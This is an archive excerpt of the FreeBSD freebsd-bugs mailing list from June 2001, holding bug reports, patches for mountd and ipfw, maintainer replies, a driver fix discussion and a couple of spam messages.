-HUP mountd >Fix: --- mountd.c.orig Fri Jun 1 19:32:10 2001 +++ mountd.c Tue Jun 5 07:26:39 2001 @@ -2089,7 +2089,7 @@ return (1); } if ((opt_flags & OP_MASK) && (opt_flags & OP_NET) == 0) { - syslog(LOG_ERR, "-mask requires -net"); + syslog(LOG_ERR, "-mask requires -network"); return (1); } if ((opt_flags & OP_ALLDIRS) && dp->dp_left) { >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 14:59: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BFDD37B406; Mon, 4 Jun 2001 14:59:01 -0700 (PDT) (envelope-from bmilekic@FreeBSD.org) Received: (from bmilekic@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Lx0m17278; Mon, 4 Jun 2001 14:59:00 -0700 (PDT) (envelope-from bmilekic) Date: Mon, 4 Jun 2001 14:59:00 -0700 (PDT) From: Message-Id: <200106042159.f54Lx0m17278@freefall.freebsd.org> To: dirk.meyer@dinoex.sub.org, bmilekic@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/24949: mbuf memory leak in de0 driver Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mbuf memory leak in de0 driver State-Changed-From-To: open-> feedback State-Changed-By: bmilekic State-Changed-When: Mon Jun 4 14:51:45 PDT 2001 State-Changed-Why: The PR `netstat -m' output(s) suggest that there is no leak but only that something may be pre-allocating several mbufs, which isn't a big deal. The number of allocated mbufs and clusters first rises but then decreases, even though the peak clearly rises, but the system seems to stay steady from that point on. A `slow down' is mentionned, but it is difficult from the provided information to determine where the slow-down is occuring and certainly, we have not observed a similar thing here. The PR is not being closed just yet. I would like to urge the submitter to re-submit, if possible, some more information regarding the slow-down, assuming that it is still occuring and, if it is no longer occuring, to let us know so that we can close the PR. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24949 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 15: 0:21 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D8F6637B408 for ; Mon, 4 Jun 2001 15:00:13 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54M0Dt17399; Mon, 4 Jun 2001 15:00:13 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1F6E737B403 for ; Mon, 4 Jun 2001 14:54:40 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Lse016936; Mon, 4 Jun 2001 14:54:40 -0700 (PDT) (envelope-from nobody) Message-Id: <200106042154.f54Lse016936@freefall.freebsd.org> Date: Mon, 4 Jun 2001 14:54:40 -0700 (PDT) From: proett@pbspro.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27880: select fails to return incoming connect Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27880 >Category: misc >Synopsis: select fails to return incoming connect >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 04 15:00:13 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Tom Proett >Release: 4.3-STABLE >Organization: Veridian Systems >Environment: FreeBSD mongo.pbspro.com 4.3-STABLE FreeBSD 4.3-STABLE #3: Thu May 10 16:27:47 PDT 2001 proett@mongo.pbspro.com:/usr/src/sys/compile/BONGO i386 >Description: A program sets up a socket to listen to and waits for incoming connections in select. A second program calls connect which is fairly often not detected. >How-To-Repeat: Run these two programs on the same 4.3 machine. begin 644 two.tgz M'XL(`"<"'#L``^U7?T_C1A#E7_M3#*E([5,`._Q2+U`I*CDU*@VG!*[J<2?+ MV!MB7;*.O&LHK?CNG=FUDS@$N-,=M%7WG\Z@2N1"AAG` MVC1+F90/^]V,&!N_1$`OB^\2'HWSF%F'0L9)NC7ZT9Z;NG7!IT>^6'8W"S'I%UHN/+?LOVZ*A8=P`3I-`,!QB8[PU(&-AC`_S.93F=3A6 M]S3'`5Q]""I06#^"I@L8CS6<9AC3T,&BLBQK0"T7X15[#1M"Q<3SR0=>TXE= M>!]=I+?8'XET?'J\*SB=80Q'H"OHM-\$W5[GK`&#TY]^"09G_4[[UP9XK@N' M>%6+3G&I-'-J>D9M%2OR^90+D^243J5#%1N\(RO=* M@:O9L^#5KU4U(PZLF(6F:)P*AGP/O)4Q[A3&U7J[+AP=P:9?I=(.NOR/5?O-N8F,624=S#+KO.TA2]GSO_.2DO-:+@%0"E#Y?3'G> M\("@"BQVA"J+VFYA%+%B6SS23G7DF)>$)JXHBJ9Z(+H0,=,C]U;[L@K2E'(-I%+DL!&K]IL5 M^3/ZXK,$_)/!/-1=2L+0LU/SFP=;'O[S:^X3G::E1,HY2=.O%/0%C:[Y8LG+ MS7B3)9(Y,P75Q/FTW9=HE-Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 16: 8:50 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from prophecycommunications.com (adsl-151-203-77-36.bostma.adsl.bellatlantic.net [151.203.77.36]) by hub.freebsd.org (Postfix) with SMTP id 8566037B401 for ; Mon, 4 Jun 2001 16:08:46 -0700 (PDT) (envelope-from support.blakbiz@verizon.net) From: To: Date: Mon, 4 Jun 2001 15:32:26 Message-Id: <171.753311.520067@prophecycommunications.com> Subject: Greetings & Info... Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -apologies if you receive this by mistake. see end of message- Greetings... I am sending this out to let you all know about future updates to the website coming soon.... end of summer 2001!! http://www.prophecycommunications.com Also to invite you all to check out upcoming info on... Poetry (written & spoken word) by Jamarhl Crawford Books, CDs, MP3s, internet video ---- Strictly conscious Hip-Hop from UNO The Prophet CDs, MP3s, internet video ---- More Culturally Conscious products and info Books, CDs, Films, Commentaries, etc. info on various events nationwide, business & graphic design services; flyers, bus. cards, brochures, posters. plus weblinks to hot sites, chat, network, etc. free downloads, files, images **future emails will be informative, brief, to the point and culturally relevant. no foolishness, no clutter. This is not a group,I will not send out excessive emails** PEACE, PROSPERITY & HEALTH please support Black Entrepeneurs --------remove-----remove--------------- If you received this by mistake or if you feel you would not be interested in receiving minimal future emails regarding the cultural information described above, please accept my apology for disturbing you and reply to this message with the subject "remove me" and you will not be included in future emailings. Your presence will be missed. Apologies again. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 16:57:44 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 69D7037B401; Mon, 4 Jun 2001 16:57:42 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54NvgH32345; Mon, 4 Jun 2001 16:57:42 -0700 (PDT) (envelope-from iedowse) Date: Mon, 4 Jun 2001 16:57:42 -0700 (PDT) From: Message-Id: <200106042357.f54NvgH32345@freefall.freebsd.org> To: pdh@moreton.com.au, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/27878: [PATCH] mountd has incorrect usage output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] mountd has incorrect usage output State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Mon Jun 4 16:53:59 PDT 2001 State-Changed-Why: Committed, in revision 1.39.2.2 of mountd.c, thanks! This had been fixed already in -current, so that bit of revision 1.48 just needed to be merged. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27878 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 18:38:44 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 67E6D37B401; Mon, 4 Jun 2001 18:38:41 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f551cfQ59043; Mon, 4 Jun 2001 18:38:41 -0700 (PDT) (envelope-from dd) Date: Mon, 4 Jun 2001 18:38:41 -0700 (PDT) From: Message-Id: <200106050138.f551cfQ59043@freefall.freebsd.org> To: cschuber@uumail.gov.bc.ca, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/3685: [PATCH] panic: fdesc attr Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] panic: fdesc attr State-Changed-From-To: suspended->closed State-Changed-By: dd State-Changed-When: Mon Jun 4 18:38:31 PDT 2001 State-Changed-Why: Requested by originator. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=3685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 19:40: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 48ED237B405 for ; Mon, 4 Jun 2001 19:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f552e3c68504; Mon, 4 Jun 2001 19:40:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 19:40:03 -0700 (PDT) Message-Id: <200106050240.f552e3c68504@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Shawn Murphy" Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Reply-To: "Shawn Murphy" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27432; it has been noted by GNATS. From: "Shawn Murphy" To: "Yar Tikhiy" , Cc: Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Date: Mon, 4 Jun 2001 22:39:20 -0500 Yar, Thank you for the advice, it did fix the problem. What would you recommend for a value? I doubled it (to 16). Will that cause any problems. Will it cause inefficiency? Thanks for your time, -Shawn On 3 Jun 2001, at 12:07, Yar Tikhiy wrote: > Please try increasing MAXDEP (file /usr/src/sys/isa/pnpparse.c at > about line 39). Unfortunately, the kernel message is rather misleading > because the number "8" in it is the MAXDEP value, not the actual > number of dependencies in your PnP configuration. -- Yar > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 21:28:59 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from femail10.sdc1.sfba.home.com (femail10.sdc1.sfba.home.com [24.0.95.106]) by hub.freebsd.org (Postfix) with ESMTP id 2D2B437B401 for ; Mon, 4 Jun 2001 21:28:58 -0700 (PDT) (envelope-from info@workplacediversity.com) Received: from cc263097-b ([24.13.74.132]) by femail10.sdc1.sfba.home.com (InterMail vM.4.01.03.20 201-229-121-120-20010223) with SMTP id <20010605042856.RFDQ24283.femail10.sdc1.sfba.home.com@cc263097-b>; Mon, 4 Jun 2001 21:28:56 -0700 From: "WorkplaceDiversity.com" To: Dear Job Seeker Reply-To: Subject: A New Diversity Career Site! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message-Id: <20010605042856.RFDQ24283.femail10.sdc1.sfba.home.com@cc263097-b> Date: Mon, 4 Jun 2001 21:28:56 -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dear Job Seeker, We would like to invite you to visit WorkplaceDiversity.com= (www.workplacediversity.com). The source for diversity talent,= WorkplaceDiversity.com is a career Web site for recruiters who= want to reach experienced diversity candidates like you. At= WorkplaceDiversity.com you can find jobs at companies that= support diversity, read articles that will help you get ahead in= your career, and use the Insider Company Research to find out= about companies that you are interested in. Step up to a better career! Visit= www.WorkplaceDiversity.com today! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 23:50:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CD1DD37B403 for ; Mon, 4 Jun 2001 23:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f556o1B12847; Mon, 4 Jun 2001 23:50:01 -0700 (PDT) (envelope-from gnats) Received: from ajax2.sovam.com (ajax2.sovam.com [194.67.1.173]) by hub.freebsd.org (Postfix) with ESMTP id D4D1237B403 for ; Mon, 4 Jun 2001 23:46:58 -0700 (PDT) (envelope-from avn@any.ru) Received: from ts9-a239.dial.sovam.com ([195.239.70.239]:1270 "EHLO srv2.any" ident: "TIMEDOUT" whoson: "-unregistered-" smtp-auth: TLS-CIPHER: "EDH-RSA-DES-CBC3-SHA keybits 192/192 version TLSv1/SSLv3" TLS-PEER: ) by ajax2.sovam.com with ESMTP id ; Tue, 5 Jun 2001 10:46:44 +0400 Received: (from avn@localhost) by srv2.any (8.11.3/8.11.3) id f556jNX04851; Tue, 5 Jun 2001 10:45:23 +0400 (MSD) (envelope-from avn) Message-Id: <200106050645.f556jNX04851@srv2.any> Date: Tue, 5 Jun 2001 10:45:23 +0400 (MSD) From: avn@any.ru Reply-To: avn@any.ru To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27887: ipfw 'backup' option proposal Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27887 >Category: bin >Synopsis: ipfw 'backup' option proposal >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jun 04 23:50:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Alexey V. Neyman >Release: FreeBSD 4.3-STABLE i386 >Organization: http://www.any.ru/ >Environment: System: FreeBSD srv2.any 4.3-STABLE FreeBSD 4.3-STABLE #2: Thu May 17 19:01:42 MSD 2001 toor@srv2.any:/usr2/obj/usr2/src/sys/SRV2 i386 >Description: Usage of ipfw on remote systems is often dangerous, and handbook explicitly warns about this. IMO it can be useful to have a 'backup' option to ipfw, which would restore previous ruleset in case that user locked himself out. It saves the ruleset, performs requested changes to ipfw and asks a user if he is still on-line. In case of disconnection, timeout of 15 seconds, or signal delivery, it restores previous ruleset. As for now, AFAIK, there is no interface to introduce dynamic rules directly, so it restores only static ruleset, and does not restore pipes too. But, it should be enough in most cases to allow user get back again. Patch below is against 4.3-STABLE, I was not able to test against -CURRENT for now, I will probably in a week. >How-To-Repeat: This is a change-request. >Fix: --- ipfw.c.orig Tue Feb 20 17:05:37 2001 +++ ipfw.c Tue May 29 23:43:22 2001 @@ -67,6 +67,7 @@ do_pipe, /* this cmd refers to a pipe */ do_sort, /* field to sort results (0=no) */ verbose; +void *rules_backup; /* ruleset backup, if not NULL */ struct icmpcode { int code; @@ -94,6 +95,8 @@ }; static void show_usage(const char *fmt, ...); +static void backup_rules(); +static void restore_rules(); static int mask_bits(struct in_addr m_ad) @@ -602,12 +605,32 @@ } static void +get_rules(data, nbytes) + void **data; + int *nbytes; +{ + const int unit = do_pipe ? sizeof(struct ip_fw) : sizeof(struct dn_pipe); + const int ocmd = do_pipe ? IP_DUMMYNET_GET : IP_FW_GET; + int nalloc = unit; + *nbytes = nalloc ; + + while (*nbytes >= nalloc) { + nalloc = nalloc * 2 + 200; + *nbytes = nalloc ; + if ((*data = realloc(*data, *nbytes)) == NULL) + err(EX_OSERR, "realloc"); + if (getsockopt(s, IPPROTO_IP, ocmd, *data, nbytes) < 0) + err(EX_OSERR, "getsockopt(IP_%s_GET)", + do_pipe ? "DUMMYNET" : "FW"); + } +} + +static void list(ac, av) int ac; char **av; { struct ip_fw *rules; - struct dn_pipe *pipes; void *data = NULL; int pcwidth = 0; int bcwidth = 0; @@ -615,22 +638,7 @@ int nbytes; /* get rules or pipes from kernel, resizing array as necessary */ - { - const int unit = do_pipe ? sizeof(*pipes) : sizeof(*rules); - const int ocmd = do_pipe ? IP_DUMMYNET_GET : IP_FW_GET; - int nalloc = unit; - nbytes = nalloc ; - - while (nbytes >= nalloc) { - nalloc = nalloc * 2 + 200; - nbytes = nalloc ; - if ((data = realloc(data, nbytes)) == NULL) - err(EX_OSERR, "realloc"); - if (getsockopt(s, IPPROTO_IP, ocmd, data, &nbytes) < 0) - err(EX_OSERR, "getsockopt(IP_%s_GET)", - do_pipe ? "DUMMYNET" : "FW"); - } - } + get_rules(&data, &nbytes); /* display requested pipes */ if (do_pipe) { @@ -857,6 +865,7 @@ " droptail\n" ); + restore_rules(); exit(EX_USAGE); } @@ -2069,6 +2078,81 @@ } } +static void +backup_rules() +{ + int nbytes, saved_do_pipe; + + if (!isatty(STDIN_FILENO)) + return; + saved_do_pipe = do_pipe; + do_pipe = 0; + get_rules(&rules_backup, &nbytes); + do_pipe = saved_do_pipe; +} + +static void +sighnd(signo) + int signo; +{ +} + +static void +restore_rules() +{ + struct ip_fw *rules; + int i, sz, c; + fd_set fdr; + struct timeval tv; + + if (rules_backup == NULL) + return; + + /* Ask the user */ + printf("Everything ok? [yn] "); + FD_ZERO(&fdr); + FD_SET(STDIN_FILENO, &fdr); + tv.tv_sec = 15; + tv.tv_usec = 0; + signal(SIGHUP, sighnd); + signal(SIGINT, sighnd); + signal(SIGTERM, sighnd); + if (select(STDIN_FILENO + 1, &fdr, NULL, NULL, &tv) < 0 + || !FD_ISSET(STDIN_FILENO, &fdr)) { + printf("\n"); + goto restore; + } + + do { + fflush(stdout); + c = toupper(getc(stdin)); + while (c != '\n' && getc(stdin) != '\n') + if (feof(stdin)) + goto restore; + } while (c != 'Y' && c != 'N'); + + printf("\n"); + if (c == 'Y') { + free(rules_backup); + rules_backup = NULL; + return; + } + +restore: + if (setsockopt(s, IPPROTO_IP, IP_FW_FLUSH, NULL, 0) < 0) + err(EX_UNAVAILABLE, "setsockopt(IP_FW_FLUSH)"); + + rules = (struct ip_fw *)rules_backup; + for (i = 0; rules[i].fw_number < 65535; i++) { + sz = sizeof(*rules); + if (getsockopt(s, IPPROTO_IP, IP_FW_ADD, rules + i, &sz) < 0) + err(EX_UNAVAILABLE, "getsockopt(%s)", "IP_FW_ADD"); + } + printf("Restored previous ruleset.\n"); + free(rules_backup); + rules_backup = NULL; +} + static int ipfw_main(ac,av) int ac; @@ -2089,7 +2173,7 @@ do_force = !isatty(STDIN_FILENO); optind = optreset = 1; - while ((ch = getopt(ac, av, "s:afqtvN")) != -1) + while ((ch = getopt(ac, av, "s:abfqtvN")) != -1) switch(ch) { case 's': /* sort */ do_sort= atoi(optarg); @@ -2097,6 +2181,9 @@ case 'a': do_acct=1; break; + case 'b': + backup_rules(); + break; case 'f': do_force=1; break; @@ -2211,6 +2298,7 @@ err(EX_UNAVAILABLE, "socket"); setbuf(stdout,0); + rules_backup = NULL; /* * this is a nasty check on the last argument!!! @@ -2222,7 +2310,7 @@ qflag = pflag = i = 0; lineno = 0; - while ((c = getopt(ac, av, "D:U:p:q")) != -1) + while ((c = getopt(ac, av, "D:U:bp:q")) != -1) switch(c) { case 'D': if (!pflag) @@ -2244,6 +2332,10 @@ args[i++] = optarg; break; + case 'b': + backup_rules(); + break; + case 'p': pflag = 1; cmd = optarg; @@ -2345,5 +2437,7 @@ } else ipfw_main(ac,av); + + restore_rules(); return EX_OK; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 0:30: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C419D37B401 for ; Tue, 5 Jun 2001 00:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f557U2119260; Tue, 5 Jun 2001 00:30:02 -0700 (PDT) (envelope-from gnats) Date: Tue, 5 Jun 2001 00:30:02 -0700 (PDT) Message-Id: <200106050730.f557U2119260@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bill Fumerola Subject: Re: bin/27887: ipfw 'backup' option proposal Reply-To: Bill Fumerola Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27887; it has been noted by GNATS. From: Bill Fumerola To: FreeBSD-gnats-submit@freebsd.org Cc: Subject: Re: bin/27887: ipfw 'backup' option proposal Date: Tue, 5 Jun 2001 02:26:19 -0500 On Tue, Jun 05, 2001 at 10:45:23AM +0400, avn@any.ru wrote: > >Description: > Usage of ipfw on remote systems is often dangerous, and handbook > explicitly warns about this. IMO it can be useful to have a 'backup' > option to ipfw, which would restore previous ruleset in case that > user locked himself out. It saves the ruleset, performs requested > changes to ipfw and asks a user if he is still on-line. In case of > disconnection, timeout of 15 seconds, or signal delivery, it restores > previous ruleset. As for now, AFAIK, there is no interface to introduce > dynamic rules directly, so it restores only static ruleset, and does > not restore pipes too. But, it should be enough in most cases to > allow user get back again. potential committers: don't commit this. I have a much more generic (atomic changing of rulesets, recursive inclusing of rulesets) implementation that I might finish one of these days... in any case, doing this in ipfw(8) doesn't even seem like the right place to pull this off.. -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 4:50: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5355137B403 for ; Tue, 5 Jun 2001 04:50:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Bo4658471; Tue, 5 Jun 2001 04:50:04 -0700 (PDT) (envelope-from gnats) Date: Tue, 5 Jun 2001 04:50:04 -0700 (PDT) Message-Id: <200106051150.f55Bo4658471@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: kern/24137: Aironet driver breaks after firmware upgrade Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/24137; it has been noted by GNATS. From: Martin Blapp To: Cc: Subject: Re: kern/24137: Aironet driver breaks after firmware upgrade Date: Tue, 5 Jun 2001 13:49:37 +0200 (CEST) Hi, This issue still exists. Your patch has been comitted to CURRENT, but as you said there were two bytes, not one. I have now: - u_int16_t an_spare[2]; + u_int16_t an_spare[5]; and now it works good. (Maybe four is enough, but with three, I still get the same checksum missmatch.) Martin Martin Blapp, mb@imp.ch ------------------------------------------------ Improware AG, UNIX solution and service provider Zurlindenstrasse 29, 4133 Pratteln, Switzerland Phone: +41 79 370 26 05, Fax: +41 61 826 93 01 ------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 7:36: 8 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from pragmatix.bangor.ac.uk (pragmatix.bangor.ac.uk [147.143.2.14]) by hub.freebsd.org (Postfix) with ESMTP id 07ED437B401; Tue, 5 Jun 2001 07:36:01 -0700 (PDT) (envelope-from g.w.roberts@bangor.ac.uk) Received: from hysterix.bangor.ac.uk (hysterix [147.143.2.6]) by pragmatix.bangor.ac.uk (8.9.3+Sun/8.9.3) with ESMTP id PAA21756; Tue, 5 Jun 2001 15:35:52 +0100 (BST) Received: from bangor.ac.uk (math2 [147.143.10.13]) by hysterix.bangor.ac.uk (8.8.8/8.8.8) with ESMTP id PAA18850; Tue, 5 Jun 2001 15:35:49 +0100 (BST) Message-ID: <3B1CEE44.D77FFC97@bangor.ac.uk> Date: Tue, 05 Jun 2001 15:35:48 +0100 From: "G.W.Roberts" X-Mailer: Mozilla 4.51 [en] (X11; I; OSF1 V4.0 alpha) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-gnats-submit@freebsd.org, LLazarte@mat.unb.br, freebsd-bugs@freebsd.org, "Lazaro D. Salem" , n_hibma@freebsd.org, dougb@freebsd.org Subject: Re: i386/10690: Installation freezes after device selection, while "probing". Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This bug, or similar, is still not fixed - see PRs 18201, 26686, 26736. -- Dr G W Roberts Dr G W Roberts Adran Mathemateg Department of Mathematics Ysgol Gwybodeg School of Informatics Prifysgol Cymru University of Wales Stryd y Deon Dean Street Bangor Bangor Gwynedd Gwynedd LL57 1UT LL57 1UT DU UK Email: G.W.Roberts@bangor.ac.uk Tel: +44 (0)1248 382480 Ffacs: +44 (0)1248 361429 WWW: http://www.informatics.bangor.ac.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 7:40: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 475F037B405 for ; Tue, 5 Jun 2001 07:40:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Ee5H83285; Tue, 5 Jun 2001 07:40:05 -0700 (PDT) (envelope-from gnats) Date: Tue, 5 Jun 2001 07:40:05 -0700 (PDT) Message-Id: <200106051440.f55Ee5H83285@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "G.W.Roberts" Subject: Re: i386/10690: Installation freezes after device selection, while "probing". Reply-To: "G.W.Roberts" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/10690; it has been noted by GNATS. From: "G.W.Roberts" To: freebsd-gnats-submit@freebsd.org, LLazarte@mat.unb.br, freebsd-bugs@freebsd.org, "Lazaro D. Salem" , n_hibma@freebsd.org, dougb@freebsd.org Cc: Subject: Re: i386/10690: Installation freezes after device selection, while "probing". Date: Tue, 05 Jun 2001 15:35:48 +0100 This bug, or similar, is still not fixed - see PRs 18201, 26686, 26736. -- Dr G W Roberts Dr G W Roberts Adran Mathemateg Department of Mathematics Ysgol Gwybodeg School of Informatics Prifysgol Cymru University of Wales Stryd y Deon Dean Street Bangor Bangor Gwynedd Gwynedd LL57 1UT LL57 1UT DU UK Email: G.W.Roberts@bangor.ac.uk Tel: +44 (0)1248 382480 Ffacs: +44 (0)1248 361429 WWW: http://www.informatics.bangor.ac.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 8:33: 2 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F3C437B407; Tue, 5 Jun 2001 08:33:00 -0700 (PDT) (envelope-from hm@FreeBSD.org) Received: (from hm@localhost) by freefall.freebsd.org 